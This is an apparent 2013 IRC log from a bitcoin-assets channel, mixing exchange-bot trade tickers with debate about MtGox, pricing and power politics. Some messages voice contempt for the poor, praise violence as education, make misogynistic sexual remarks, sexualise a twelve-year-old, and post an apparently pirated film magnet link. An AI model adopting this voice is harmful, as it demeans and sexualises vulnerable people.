Apr 15 02:46:05 mtgox frontruns to all shit and yet it lost its shirt Apr 15 02:46:15 because they really thought stability is above 100 Apr 15 02:46:40 mircea_popescu: as far as I can tell, its shirt is still on. and the operator is laughing all the way to the (fiat) bank. Apr 15 02:46:53 orly ? and on what do you tell this ? Apr 15 02:47:05 did you see all that pizza he ate? Apr 15 02:47:07 :) Apr 15 02:47:09 mircea_popescu: the damn thing is still online and trading, for one Apr 15 02:47:49 by that approach that options site referenced earlier is "laughing all the way to the bank" Apr 15 02:48:16 mp do you ever laugh at the bank? Apr 15 02:48:35 notrly. Apr 15 02:48:45 first sign of a bubble Apr 15 02:48:50 lmao Apr 15 02:48:55 :) Apr 15 02:49:03 if the real purpose of MtGox is to bring in tons of chump money for the owner, then it is working great, even if it will soon be done serving its purpose. Apr 15 02:49:28 reports of gox's death are exaggerated Apr 15 02:51:25 well you can always have an ex post facto definition of the purpose of an item that suits its actual history. Apr 15 02:51:39 [MPEX] [S.MPOE] 22650 @ 0.00068305 = 15.4711 BTC [-] Apr 15 02:51:41 go hit on a girl, she turns yhou down, you meant for her to turn you down all along. sure. Apr 15 02:52:39 mircea_popescu: this is more like, you do the 100,000th girl and your cock falls off from exceeding its MTBF. Apr 15 02:53:22 hardly. Apr 15 02:54:54 mircea_popescu: at any rate, why are we burying MtGox again? who exactly is a serious contender for its throne? Apr 15 02:55:17 nobody. Apr 15 02:55:31 who is a serious contender for the exchange dollars to euros "throne" irl ? Apr 15 02:56:21 no one Apr 15 02:56:51 right. cause it's a side business of no particular value or import Apr 15 02:57:02 unless you're in like iran or some other primitive economy. Apr 15 02:57:34 any lackey of the traditional banking system can trade USD for EUR, so it is unremarkable. but there appears to be a limited number of people with the balls and connections to run automated BTC/fiat exchanges. Apr 15 02:58:38 notrly. Apr 15 02:58:38 [BTCTC] [RSM] 2 @ 0.0018 = 0.0036 BTC [+] Apr 15 02:58:40 BTC-fiat trading might be a "winner take all" game, like cocaine cartels. Apr 15 02:59:41 the prize goes to whoever can suck in and spit out fiat with the smallest transaction cost. Apr 15 03:00:18 it's not a game at all. Apr 15 03:00:24 (esp. if you include the cost of establishing reputation in said cost. otherwise my front door could be a top BTC exchange.) Apr 15 03:01:59 [HAVELOCK] [VTX] 1 @ 0.48 BTC [+] Apr 15 03:02:36 except they've established the worst reputation ever. Apr 15 03:02:41 i don't see any value there. Apr 15 03:04:26 mircea_popescu: nah, the worst reputation is just some random address you can send BTC or wire USD to from which nothing comes out again. MtGox is still a league above the rest, considering that this is what the rest is by default. Apr 15 03:06:19 mircea_popescu: what, exactly, is the practical alternative to Gox right now? OTC, where one has to actually deal with humans? BTC-e, where BTC consistently traces <50USD vs. gox? Apr 15 03:07:03 depends. there's no such thing as "an alternative". wjhat's the alternative to eating from the garbage ? Apr 15 03:07:10 well... depends. italian restaurants if you like italian food Apr 15 03:07:16 jewish delis if you're jewish Apr 15 03:07:29 sure, garbage bins almost always have some food in them. i wouldn't call this a "brand" Apr 15 03:07:35 mircea_popescu: no alternative, if you're a rat. and right now most BTC users are more or less that. Apr 15 03:07:49 well it also happens to not matter what the brand is among rats. Apr 15 03:08:08 the fact that all users are currently that makes zero difference on this score. Apr 15 03:09:01 mircea_popescu: to run with the analogy, you should wonder why most of the non-rats are ignoring the Italian restaurant in favour of the garbage dump. Apr 15 03:09:12 they are not. Apr 15 03:09:30 i seriously don't know anyone who's neither a noob or an idiot seriously using mtgox. Apr 15 03:09:50 sure, on ocasion. but fact remains most major players don't even have an account with them Apr 15 03:10:00 mircea_popescu: so why is the life (and death) of MtGox a subject of interest to you? Apr 15 03:10:22 because a. they keep making dumbass statements that then get fed into the dumbass press which make btc look like a scam Apr 15 03:10:38 and b. because they back all sorts of dubious shit and are generally part of the axis of evil. Apr 15 03:11:03 if it doesn't matter what the rats do or think, why would MtGox's effect on the rat media matter? Apr 15 03:11:21 look, everywhere there's going to be pest control. Apr 15 03:11:25 this is not because rats matter. Apr 15 03:11:44 it's precisely so they never do. Apr 15 03:12:01 "guard labour", yes Apr 15 03:12:23 in a sense Apr 15 03:13:59 [HAVELOCK] [HIM] 1 @ 1.422 BTC [+] Apr 15 03:14:14 to continue with the analogy, virtually all of the serious BTC people are "rat catchers." In that much of their winnings derive from the "stupid money" at the table - MtGox, people who buy BTC there because the TV said to, etc. Apr 15 03:14:15 "guard labour" is a void notion pretty much. it stems from the ultimately doomed attempt of the intellectually bankrupt left to justify it's nonsense. Apr 15 03:14:42 and no. the rich are not rich because they've stiolen from the poor, or from the stupid. Apr 15 03:14:54 how did you end up so immersed in red ideology anyway ? Apr 15 03:14:57 stolen is the wrong word, when people are shoving money at you voluntarily Apr 15 03:14:59 [HAVELOCK] [VTX] 1 @ 0.445 BTC [-] Apr 15 03:15:09 it's never a case of anything vaguely related. Apr 15 03:15:21 money simply follows its own rules, and concentrates in adequate places. Apr 15 03:15:32 rthe poor are poor because they are failed human beings, not for any other reason. Apr 15 03:15:46 money can best be understood as the practical equivalent of the theological concept of "grace of god" Apr 15 03:15:53 you don't have money... well it just means you suck. Apr 15 03:15:54 so why is the herd of morons pumping MtGox full of dollars such a bad thing? Apr 15 03:16:00 that's not the bad thing. Apr 15 03:16:07 mtgox doing such a horrible job of it is the bad thing. Apr 15 03:16:34 can't argue with that Apr 15 03:16:58 I use MtGox. Albeit not to daytrade, it's too damn slow for that. Apr 15 03:17:18 To exit BTC, waiting to buy back in. Apr 15 03:17:41 (AFAIK there's nothing "red" about the concept of guard labour. it is just the banal fact that you have to hire rat-catchers if your planet has rats, and this costs you something.) Apr 15 03:18:02 Involves waiting a few weeks, and I don't trust other exchanges enough to deposit there. Apr 15 03:18:19 asciilifeform it is at the very least red because its only practical use is to try and give credence to this nonsense theory whereby inequality breeds stagnation through "waste". Apr 15 03:18:36 whereas the only true measure of development is inequality, Apr 15 03:18:45 and the only places not worth living into are those devoid of inequality. Apr 15 03:19:19 well yes, but all else being equal, you want the peasants to submit willingly, rather than hire people to pummel them (with gold that you could otherwise buy a second golden helicopter with.) Apr 15 03:19:32 not the case. Apr 15 03:19:41 the only practical way to educate the human being is through violence. Apr 15 03:19:46 as long as you mean to enlighten you mean to beat. Apr 15 03:19:54 this has nothing to do with protecting anything of yours. Apr 15 03:20:24 yes, but presumably the cost of administering more of a beating than is necessary for a full education is a net waste. Apr 15 03:20:32 there is no such thing Apr 15 03:20:45 education is purely a sexual process. what's this "more fucks than necessary" ? Apr 15 03:21:30 the effort of fucking a pregnant woman (for instance) is in no way wasted. Apr 15 03:22:02 mircea_popescu: fast-forward a decade. you run a kingdom. do you care to spend all of your time personally quashing revolts? Apr 15 03:22:16 that's the motherfucking point of a kingdom. Apr 15 03:22:26 people need a good answer as to why the fuck they're your subjects. Apr 15 03:22:33 if this is too muich work for you time to retire. Apr 15 03:22:56 trying to save on fucking ain't the way to go about marriage. Apr 15 03:23:38 mircea_popescu: seems like you were born a few 1000 years too late... Apr 15 03:23:53 mircea_popescu: Rome needs you Apr 15 03:24:12 lol Apr 15 03:24:27 i just happen to be able to fit more on my bus than the current fashion Apr 15 03:24:45 in rome i'd have probably driven them up the wall with my globalist ideas. Apr 15 03:25:22 I think Rome could learn; "BitDenarius..." Apr 15 03:25:26 lol. Apr 15 03:25:37 but think about it : the old guard of the soviet republic, them people in their leather jackets Apr 15 03:25:43 they're a form of expression of that state. Apr 15 03:25:51 save on that ?! what sense does it make! Apr 15 03:25:59 that's what you do! it's like asking van gogh to save on paint. Apr 15 03:26:29 tell hemingway "could you rewrite this ? all the m's and w's use so much ink... try writing with more i's instead" Apr 15 03:26:47 actually, Stalin ramped up industry, the war machine, etc. by saving on the men in the leather jackets. (Most of the purging was of the old purging apparatus.) Resources are, unfortunately, finite. Apr 15 03:27:00 this isn't even true. Apr 15 03:27:09 what, leningrad was half purging apparatuses ? Apr 15 03:27:19 he purged the very generals that won the war Apr 15 03:27:23 late rome style. Apr 15 03:27:55 and there's a reason the tinted windows tinted glasses douches in the us have infinite budgets atm. they are THE state. Apr 15 03:28:07 mircea_popescu: well yes. Apr 15 03:28:09 or moreover this is what the state is, much like a supermodel is her tits and her waist Apr 15 03:28:19 and her ankles and so forth Apr 15 03:28:20 mircea_popescu: and what, you would let the successful generals live? so they can take your throne? Apr 15 03:28:35 you misunderstand the relationship between the powerful and power. Apr 15 03:29:24 i think the problem is something along these lines : young cock gets into night club, sees successful local mobster with the three girls dotting on him. figures this is a cool squarejaw, he's forcing these women to do such things. Apr 15 03:29:33 no, he's not. most of his time is spent trtying to keep such women at bay. Apr 15 03:29:46 these three are just there cause they;'re the least obnoxious of a sea of similar bitches in heat. Apr 15 03:29:54 consider Gen. Zhukov. Too popular, more or less un-purgeable. He had to be slowly demoted, transferred to the outskirts of the empire, finessed into oblivion. Or he would have gone for the throne, for sure. Apr 15 03:29:56 just so with power. the powerful don't actively seek it. it seeks them. Apr 15 03:30:06 nope. Apr 15 03:30:13 nobody who endfs on the throne actually goes for the throne. Apr 15 03:31:41 yes, the throne finds you. everybody seems to say this. Apr 15 03:31:58 but in what sense is it true, if you plugged the four other contenders before it found you. Apr 15 03:32:05 ;;eightball does game of thrones come on tonight? Apr 15 03:32:05 About as likely as pigs flying. Apr 15 03:32:10 XD Apr 15 03:32:15 this thing is pretty good Apr 15 03:32:23 i never met stalin or jukov, but i can take an oath stalin only fucked jukov because jukov pissed him off. Apr 15 03:32:32 ;;seen jurov Apr 15 03:32:32 jurov was last seen in #bitcoin-assets 1 hour, 10 minutes, and 7 seconds ago: preferably resistant to sokal attack Apr 15 03:33:09 yes, but he pissed him off by being the successful square-jaw in the nightclub. Apr 15 03:33:19 the only alternative is jukov got sick of the shit and weanted out. Apr 15 03:33:27 note that Stalin couldn't even ride a horse (Zhukov rode in the victory parade in his stead.) Apr 15 03:33:28 there's just no way stalin went "omg must protect tyhrone" Apr 15 03:33:50 i don't credit this very womanly approach to history. Apr 15 03:34:44 mircea_popescu: you seem to think that the power game has one level (sexual/personal charisma.) But it really has two: the charismatic men rise to the top, and the winner ends up being the fellow who is quicker on the draw. Apr 15 03:34:54 listen Apr 15 03:35:00 you don't really want to kill the contenders. Apr 15 03:35:01 [MPEX] [S.MPOE] 7400 @ 0.00068305 = 5.0546 BTC [-] Apr 15 03:35:07 you'd rather burn the world and go have a drink with them. Apr 15 03:35:20 you understand this ? nobody loves the wormy multitude enough to kill one good man over it. Apr 15 03:36:22 you don't plug your fellow top dogs for the wormy multitudes. you plug them so they don't - you. because there are only so many palaces/harems/etc. to go around. Apr 15 03:36:31 nobody may be too strong a world, as insanity is a good bedfellow to exceptional performance Apr 15 03:36:39 but still, generally speaking, nobody cares about the crowd. Apr 15 03:36:47 [BTCTC] [ASICMINER-PT] 1 @ 0.849 BTC [+] Apr 15 03:36:55 [BTCTC] [ASICMINER-PT] 8 @ 0.85 = 6.8 BTC [+] Apr 15 03:36:58 [MPEX] [S.MPOE] 1820 @ 0.00068305 = 1.2432 BTC [-] Apr 15 03:37:00 [BTCTC] [ASICMINER-PT] 5 @ 0.8549 = 4.2745 BTC [+] Apr 15 03:37:06 [BTCTC] [ASICMINER-PT] 2 @ 0.855 = 1.71 BTC [+] Apr 15 03:37:07 the harem scarcity is bullshit. there's currently orders of magnitude more slaves looking for masters than masters willing to take slaves. Apr 15 03:37:17 [BTCTC] [ASICMINER-PT] 3 @ 0.855 = 2.565 BTC [+] Apr 15 03:37:24 [BTCTC] [ASICMINER-PT] 5 @ 0.859 = 4.295 BTC [+] Apr 15 03:37:28 the crowd is irrelevant, except that it does seem to have a tendency to throw its support behind one guy. Apr 15 03:37:28 [BTCTC] [ASICMINER-PT] 2 @ 0.86 = 1.72 BTC [+] Apr 15 03:37:32 [BTCTC] [ASICMINER-PT] 6 @ 0.876 = 5.256 BTC [+] Apr 15 03:38:00 the fate of the triumvirate, etc. Apr 15 03:38:16 the fate of the triumvirate was that pompey despised caesar. Apr 15 03:38:32 public don't enter into it one whit. Apr 15 03:39:38 the public (for some value of public) is who eventually swings the swords. and they would rather duke it out, with one guy coming out on top, rather than pressuring Pompey to be chums with Caesar. Apr 15 03:40:00 i don;'t think they cared either way and in the end i don't think they fought for that either. Apr 15 03:40:14 people always fight for some unrelated nonsense. Apr 15 03:40:21 mircea_popescu: let's re-phrase the question a bit: who would you personally be content to share your throne with? Apr 15 03:40:31 pretty much anyone that's not stupid. Apr 15 03:40:51 [BTCTC] [ASICMINER-PT] 1 @ 0.876 BTC [+] Apr 15 03:41:56 mircea_popescu: stable shared thrones is probably why Red China outlasted the USSR. but China is a bureaucratic clusterfuck rather than the virile fucktopia you envision. Apr 15 03:42:11 okay, so who sat on the spartan throne ? Apr 15 03:42:31 mircea_popescu: point. but I'm not certain it would scale. Apr 15 03:42:39 because why not ? Apr 15 03:43:47 mircea_popescu: the ancients were a different kind of animal from us. they had notions of aristocracy/future-oriented behavour. vs. the tinted window crowd, for whom "I plug the other guy -> get double the gold" is the order of the day. Apr 15 03:44:07 so basically the old folks are too cool for us to wear their shoes ? Apr 15 03:44:14 heck of an argument you got thar. Apr 15 03:44:17 possibly. Apr 15 03:44:28 i don't feel particularly lamer than them so. Apr 15 03:44:53 mircea_popescu: perhaps you're not. but the fellows behind the tinted windows, are. Apr 15 03:45:07 "get double the gold" da fuck is that. to do what, carry it luis de funes style ? Apr 15 03:45:17 get moar gold but can't throw a party cause there's nobody to invite. Apr 15 03:45:41 mircea_popescu: maybe the very definition of being an aristocrat is that you don't feel compelled to plug the other guys. Apr 15 03:46:00 see "mandate of heaven." Apr 15 03:46:05 perhaps. it does come out a rather vulgar thing as reduced by our conversation. Apr 15 03:46:22 nevertheless, plugging the other guy has the virtue of keeping this putative aristocracy from complacency Apr 15 03:46:53 yes, but you do it for jollies/education-of-the-masses-by-the-cock, not because you feel that you have to. Apr 15 03:47:11 perhaps you just do it because it becomes clear the guy's a fuckwit. Apr 15 03:47:17 you have a point in that analysis is vulgarizing. hence "the spartan speaks with his sword." Apr 15 03:47:23 maybe go the whole japanese mile and have him cut his own guts out Apr 15 03:50:11 Seppuku is a bad example: the men ordered to do so generally faced the alternative of being beheaded like commoners (not to be confused with voluntary seppuku.) Apr 15 03:50:29 a better example: Hassan-i Sabbah Apr 15 03:50:55 or the Chinese emperor (forget which) who would order his front ranks to behead themselves on the start of a battle Apr 15 03:50:59 terrifying the enemy Apr 15 03:51:18 incidentally, you ever seen l'avare ? Apr 15 03:51:23 nope Apr 15 03:51:36 a, that's a pity. probably the best thing tyo come out of france Apr 15 03:51:45 magnet:?xt=urn:btih:50c6b7a7b42d136d1dc1bc600220ba7c30e46f4d&dn=L'Avare+(1980)(L+de+Funes)DVDRip+NL+subs[Divx]NLtoppers&tr=udp://tracker.openbittorrent.com:80&tr=udp://tracker.publicbt.com:80&tr=udp://tracker.istole.it:6969&tr=udp://tracker.ccc.de:80 Apr 15 03:52:35 will look Apr 15 03:53:11 but yes, if you can successfully order the front ranks to self-behead, you've probably got the Mandate of Heaven. Apr 15 03:53:19 anyway, not so sure sepukku is such a bad example. you have one chance to do yourself in as one of us now that you can't continue living as one of us. Apr 15 03:53:31 i don't think that implication works. Apr 15 03:54:12 well it matters, of course, if the front rank is a thousand blue blood knights, or three bums you've collected from a boozing den. Apr 15 03:54:36 no, my objection is that form is no substitute for function. Apr 15 03:54:45 what people do is no proof of what people are, in this sense. Apr 15 03:54:53 getting a girl to suck your cock is no proof you're loved. Apr 15 03:55:10 wow Apr 15 03:55:23 did I really just come back to "getting a girl to suck your cock is no proof you're loved. Apr 15 03:55:27 " Apr 15 03:55:28 but if she sucks with art and enthusiasm, perhaps that's all the proof one could hope for. Think Kamikazes instead of Chinese imperial auto-beheaders. Apr 15 03:55:47 look at you mircea_popescu droppin' some love wisdom and shit on deez homies Apr 15 03:55:56 did you know that only the men with top marks in flight school were initially accepted into the Tokkotai (Kamikaze corps) ? Apr 15 03:56:11 yes, i did. Apr 15 03:56:26 so were they sucking with love? Apr 15 03:56:32 even so. the subtle structure of the world remains inacessible. even if the girl does it with enthusiasm and art. Apr 15 03:57:30 this subtle structure would appear to be hidden from king and slave alike. Apr 15 03:57:56 kinda how the entire scholar profession developped. Apr 15 03:58:17 the pretense of the "educated" to access it is as fraudulent in today's cathedral as it was in the druid circle obviously. Apr 15 03:58:49 the scholar profession (vs scholarship per se) is really just embroidery on the fabric of society, like the palace mural-painting profession. Apr 15 03:58:57 maybe. Apr 15 03:59:27 moreover, the original branch where we got lost is the proving. Apr 15 03:59:37 there's no proof you have the mandate of heaven. nopr can ever be. Apr 15 03:59:57 true. and you do, until you don't. Apr 15 04:00:10 but I still think the abstraction is a useful one. Apr 15 04:00:17 depends on the purpose. Apr 15 04:00:34 global warming is a useful "abstraction" if you're using it to get a dumbass neighbour to stop smoking out your pool. Apr 15 04:01:21 reminds me of a tale where Chinese peasants, shortly after the red victory, calmed down upon hearing that the Emperor has returned. Apr 15 04:01:43 [MPEX] [S.MPOE] 646 @ 0.00068305 = 0.4413 BTC [-] Apr 15 04:01:45 [MPEX] [S.MPOE] 904 @ 0.00068262 = 0.6171 BTC [-] Apr 15 04:02:36 this hidden-ness and the lack of systematic solutions are exactly why the "virile fucktopia" is the only solution. Apr 15 04:02:53 whether it scales or not will decide how large a community can get, not whether it will be the norm or not. Apr 15 04:04:03 mircea_popescu: I am interested in the question of virile fucktopias because I am interested in "the science of the possible." that is, "the is" vs. the idiot "the ought" that most scholarship tends to be about. Apr 15 04:04:20 i imagined. Apr 15 04:06:23 [BTCTC] [RSM] 1 @ 0.0018 BTC [+] Apr 15 04:19:00 [HAVELOCK] [KCIM] 1 @ 1.214 BTC [+] Apr 15 04:29:30 just watched a few min of mtv video awards, wow that channel really fell apart huh? Apr 15 04:32:13 ya, sometime in 1998 Apr 15 04:39:13 [BTCTC] [ASICMINER-PT] 3 @ 0.875 = 2.625 BTC [-] Apr 15 04:42:37 [BTCTC] [ASICMINER-PT] 2 @ 0.876 = 1.752 BTC [+] Apr 15 04:47:20 [MPEX] [S.MPOE] 19800 @ 0.00068262 = 13.5159 BTC [-] Apr 15 04:49:35 [MPEX] [S.DICE] 1 @ 0.004 BTC [+] Apr 15 04:50:14 $vwap s.dice Apr 15 04:50:15 mod6: S.DICE 1 day: average: 0.00328089 high: 0.004 low: 0.00328066 volume: 3177 btc: 10.42337616 7 day: average: 0.00299325 high: 0.00409999 low: 0.0027 volume: 281669 btc: 843.10495586 30 day: average: 0.00348657 high: 0.005598 low: 0.0027 volume: 1860301 btc: 6486.07287801 Apr 15 04:54:19 [BTCTC] [S.MPOE-PT] 25 @ 0.00067 = 0.0168 BTC [-] Apr 15 04:54:27 [BTCTC] [S.MPOE-PT] 5 @ 0.00067 = 0.0034 BTC [-] Apr 15 04:54:30 [BTCTC] [S.MPOE-PT] 50 @ 0.000675 = 0.0338 BTC [+] Apr 15 04:54:35 [BTCTC] [S.MPOE-PT] 110 @ 0.000689 = 0.0758 BTC [+] Apr 15 04:55:44 [BTCTC] [ASICMINER-PT] 1 @ 0.876 BTC [+] Apr 15 04:56:43 [BTCTC] [ASICMINER-PT] 5 @ 0.879 = 4.395 BTC [+] Apr 15 04:57:36 [BTCTC] [ASICMINER-PT] 5 @ 0.8796 = 4.398 BTC [+] Apr 15 04:59:34 !ticker m S.MPOE Apr 15 04:59:35 [MPEX:S.MPOE] 1D: 0.00068262 / 0.00069523 / 0.0007217 (538731 shares, 374.54 BTC), 7D: 0.00063322 / 0.00069588 / 0.000735 (2714177 shares, 1,888.76 BTC), 30D: 0.00059218 / 0.00068885 / 0.00077505 (10960684 shares, 7,550.28 BTC) Apr 15 05:00:15 [BTCTC] [ASICMINER-PT] 17 @ 0.8797 = 14.9549 BTC [+] Apr 15 05:01:13 [BTCTC] [ASICMINER-PT] 5 @ 0.899 = 4.495 BTC [+] Apr 15 05:04:47 [BTCTC] [ASICMINER-PT] 1 @ 0.89998 BTC [+] Apr 15 05:05:10 $vwap MPOE Apr 15 05:05:11 thestringpuller: S.MPOE 1 day: average: 0.00069523 high: 0.0007217 low: 0.00068262 volume: 538731 btc: 374.54423445 7 day: average: 0.00069589 high: 0.000735 low: 0.00063322 volume: 2714177 btc: 1888.76003405 30 day: average: 0.00068885 high: 0.00077505 low: 0.00059218 volume: 10960684 btc: 7550.28122564 Apr 15 05:05:19 $bids MPOE Apr 15 05:05:47 $help Apr 15 05:05:47 thestringpuller: (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. Apr 15 05:05:55 $help all Apr 15 05:05:55 thestringpuller: Error: There is no command "all". Apr 15 05:05:58 $help bids Apr 15 05:05:58 thestringpuller: Error: There is no command "bids". Apr 15 05:06:00 $help bid Apr 15 05:06:00 thestringpuller: Error: There is no command "bid". Apr 15 05:12:38 $depth s.mpoe Apr 15 05:12:40 mircea_popescu: S.MPOE Bids: ['5422 @ 0.00068649', '4896 @ 0.00068262', '9165 @ 0.00067807', '22800 @ 0.00067644', '32500 @ 0.00067461'] Apr 15 05:12:41 mircea_popescu: Asks: ['12133 @ 0.00069049', '10000 @ 0.0007008', '3910 @ 0.00070089', '23100 @ 0.00070285', '1250 @ 0.00070788'] Apr 15 05:33:55 ;;ticker Apr 15 05:33:56 BTCUSD ticker | Best bid: 95.40118, Best ask: 95.95998, Bid-ask spread: 0.55880, Last trade: 95.48019, 24 hour volume: 156646.71403264, 24 hour low: 84.43689, 24 hour high: 109.99800, 24 hour vwap: 97.19479 Apr 15 05:34:23 no action on gox Apr 15 05:34:26 odd Apr 15 05:34:31 calm before the storm? Apr 15 05:35:36 calm before death. Apr 15 05:37:37 i think it might be trading, but not reporting Apr 15 05:41:22 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Apr 15 05:42:17 [BTCTC] [ASICMINER-PT] 1 @ 0.84 BTC [-] Apr 15 05:42:26 ;;nethash Apr 15 05:42:26 62414.5078831 Apr 15 05:42:30 still falling Apr 15 05:44:55 [BTCTC] [S.DICE-PT] 3 @ 0.00345 = 0.0104 BTC [-] Apr 15 05:45:02 [BTCTC] [S.DICE-PT] 1 @ 0.00343 BTC [-] Apr 15 05:45:09 [BTCTC] [S.DICE-PT] 1 @ 0.00321 BTC [-] Apr 15 05:45:15 [BTCTC] [S.DICE-PT] 3 @ 0.00321 = 0.0096 BTC [-] Apr 15 05:45:23 [BTCTC] [S.DICE-PT] 1 @ 0.0032 BTC [-] Apr 15 05:45:29 [BTCTC] [S.DICE-PT] 41 @ 0.00312 = 0.1279 BTC [-] Apr 15 05:50:06 [BTCTC] [CRYPTO-TRADE] 29 @ 0.2 = 5.8 BTC [+] **** BEGIN LOGGING AT Mon Apr 15 12:33:11 2013 Apr 15 12:33:57 updated by OneFixt Apr 15 12:34:27 what is ? Apr 15 12:34:44 ;;next Apr 15 12:34:45 rising to 105-108 | targets: 108, 110-113, 120, 130, 138-148, 160 | updated by OneFixt at Apr 15 2013, 7:45 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | 1 hour, 49 minutes, and 43 seconds ago Apr 15 12:34:47 that Apr 15 12:35:39 a a Apr 15 12:37:14 [BTCTC] [ASICMINER-PT] 13 @ 0.89999 = 11.6999 BTC [+] Apr 15 12:41:46 [BTCTC] [BTC-BOND] 5 @ 0.01 = 0.05 BTC [+] Apr 15 12:49:33 [MPEX] [S.MPOE] 2430 @ 0.00068597 = 1.6669 BTC [+] Apr 15 12:49:35 [MPEX] [S.MPOE] 11598 @ 0.0006933 = 8.0409 BTC [+] Apr 15 13:15:02 [HAVELOCK] [KCIM] 2 @ 1.2139 = 2.4278 BTC [-] Apr 15 13:23:48 [BTCTC] [RSM] 20 @ 0.0018 = 0.036 BTC [+] Apr 15 13:26:16 [BTCTC] [S.MPOE-PT] 45 @ 0.000689 = 0.031 BTC [+] Apr 15 13:29:41 [MPEX] [S.MPOE] 9300 @ 0.0006933 = 6.4477 BTC [+] Apr 15 13:43:46 [MPEX] [S.MPOE] 852 @ 0.0006933 = 0.5907 BTC [+] Apr 15 13:43:47 [MPEX] [S.MPOE] 1548 @ 0.0007037 = 1.0893 BTC [+] Apr 15 13:50:02 [HAVELOCK] [VTX] 1 @ 0.485 BTC [+] Apr 15 13:56:44 ;;ticker Apr 15 13:56:45 BTCUSD ticker | Best bid: 96.72000, Best ask: 97.77700, Bid-ask spread: 1.05700, Last trade: 96.72000, 24 hour volume: 142297.15764338, 24 hour low: 84.43689, 24 hour high: 105.40000, 24 hour vwap: 95.29939 Apr 15 14:06:55 ;;eightball will btc reach 150$ this week ? Apr 15 14:06:55 No. Apr 15 14:08:39 ;;eightball will btc reach 50$ this week ? Apr 15 14:08:39 Obviously. Apr 15 14:09:15 amusingly, gribble's kinda better than max keiser. Apr 15 14:09:26 hahaha Apr 15 14:10:00 i wish have like 100btc for fun to play with gribble Apr 15 14:10:19 asking every morning and buy/sell Apr 15 14:13:01 [BTCTC] [ASICMINER-PT] 1 @ 0.84 BTC [-] Apr 15 14:14:09 so sell your car. Apr 15 14:23:20 what can i do with 12btc ? Apr 15 14:23:55 so do with 12 btc Apr 15 14:24:00 you saidf you wanted 100 lol Apr 15 14:25:07 yes but if i sold my car i thinks i get 12bt haha Apr 15 14:27:49 lol Apr 15 14:28:01 [MPEX] [S.MPOE] 3052 @ 0.0007037 = 2.1477 BTC [+] Apr 15 14:28:03 [MPEX] [S.MPOE] 3948 @ 0.00070473 = 2.7823 BTC [+] Apr 15 14:29:12 punkman is a rather choice pseudonym /OT Apr 15 14:30:44 it is? I'm not a big fan Apr 15 14:31:46 it simply sounds nice on one's tongue, is all Apr 15 14:34:20 prediction for today? Apr 15 14:35:05 75-120 :/ Apr 15 14:35:34 overall trend, though? Apr 15 14:35:49 range Apr 15 14:35:55 and i'm trying to trade goods over coin, it hurts the brain Apr 15 14:36:10 ;;bids 75 Apr 15 14:36:12 There are currently 36500.533 bitcoins demanded at or over 75.0 USD, worth 3094909.86845 USD in total. | Data vintage: 0.0053 seconds Apr 15 14:36:16 ;;asks 125 Apr 15 14:36:16 There are currently 35059.129 bitcoins offered at or under 125.0 USD, worth 3926457.98079 USD in total. | Data vintage: 3.9841 seconds Apr 15 14:36:42 maybe idiots behave and we have a nice slope going to 130 till summer. Apr 15 14:37:28 idiots - not in their nature to behave... Apr 15 14:37:56 anyway - I think short-term trend is lower myself... need to retest bottom Apr 15 14:38:19 ;;eightball will we retest bottom? Apr 15 14:38:20 I doubt it very much. Apr 15 14:38:25 [MPEX] [S.MPOE] 11300 @ 0.00069569 = 7.8613 BTC [-] Apr 15 14:38:26 :p Apr 15 14:38:28 ;;next Apr 15 14:38:28 watching for another drop to 90s, then rising to 105-108 | targets: 108, 110-113, 120, 130, 138-148, 160 | updated by OneFixt at Apr 15 2013, 10:47 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 51 minutes and 26 seconds ago Apr 15 14:38:39 anyway. sure, retest bottom. Apr 15 14:39:40 too bad puts are unavailable :-( Apr 15 14:40:24 wtf is this :) ? free forecast ? Apr 15 14:40:46 [BTCTC] [BTC-BOND] 15 @ 0.01 = 0.15 BTC [+] Apr 15 14:40:51 but then again MPEX exchange membership for $1000 USD would be reward enough... Apr 15 14:41:26 haha something tells me people cringing at $7500 membership a week ago are still not running to get it at 60% discount Apr 15 14:41:37 just so they can cringe when it's $500k+ in a year or two. Apr 15 14:41:55 just 10 coins now? Apr 15 14:42:03 I like it at 60%, but I like it more at 85% off Apr 15 14:42:19 taub nope, 30. Apr 15 14:42:39 i'd take one for 10 maybe Apr 15 14:42:42 :P Apr 15 14:42:48 heh. Apr 15 14:42:50 sold mine for 15 deal ? Apr 15 14:43:04 i havce no idea why people represent this in terms of them buying something. Apr 15 14:43:11 it's an exam. yet another of life's exams most fail to pass. Apr 15 14:43:17 lol Apr 15 14:43:58 350$ was a bargain i knew it hehe Apr 15 14:44:01 I think that model is correct. Apr 15 14:44:07 when you go to get your degree you are basically paying a fee for this priviledge, equal to the value of your time you put into making the papers Apr 15 14:44:18 (not the time spent learning, the time spent making the proofs that you'cve learned) Apr 15 14:44:53 non-trivial up front fee for exchange membership (which should be limited to non-idiots), but also low marginal costs for trading... Apr 15 14:45:11 yeh. Apr 15 14:45:41 idiots go to members to trade, where fees get marked up but no upfront fee - it's how it work irl Apr 15 14:45:53 and hopefulyl they get some sense/advice in the package. Apr 15 14:46:05 not that MPEX isn't real life... Apr 15 14:46:06 making it better for everyone involved. Apr 15 14:46:56 yep Apr 15 14:54:44 of course there's a lot of friction to the model, but Apr 15 14:54:54 i think it shall prevail. Apr 15 14:58:51 well, it could be marketed better... Apr 15 15:00:29 perhaps. Apr 15 15:02:55 Agreed, I think you're just one $15 home page template away from being at the top of everyone's lists when it comes to BTC assets. Apr 15 15:02:59 there is a problem of growthspeed which is not too well understood, especially not by the average (which is to say business illiterate) entrepreneur these days. Apr 15 15:03:12 take the case of the twelve year old as an illustrative example. Apr 15 15:03:28 the surest way for her NOT being a successful fotomodel at 19 is if her tits grow too fast. Apr 15 15:03:33 True, getting growth right is non-trivial. Apr 15 15:03:41 stretchmarks are actually worse than no growth at all. Apr 15 15:04:13 Aw I said true before I knew we were going to sextown. Apr 15 15:04:14 unbalanced_ everyone, as in, the people who took btc to 260 when i told them not to go over 130 ? why does one want this everyone muddling throuhg ? Apr 15 15:04:25 unbalanced_ haha, does sextown bother you ? Apr 15 15:04:46 mpex has the highest volume in bitcoin stocks already doesnt it? Apr 15 15:04:54 last i looked, yes. Apr 15 15:05:17 even so i am more worried by things such as sdice going to 75 then to 29 for no apparent reason Apr 15 15:05:21 than with growing market share. Apr 15 15:05:40 I want to see bitcoin and 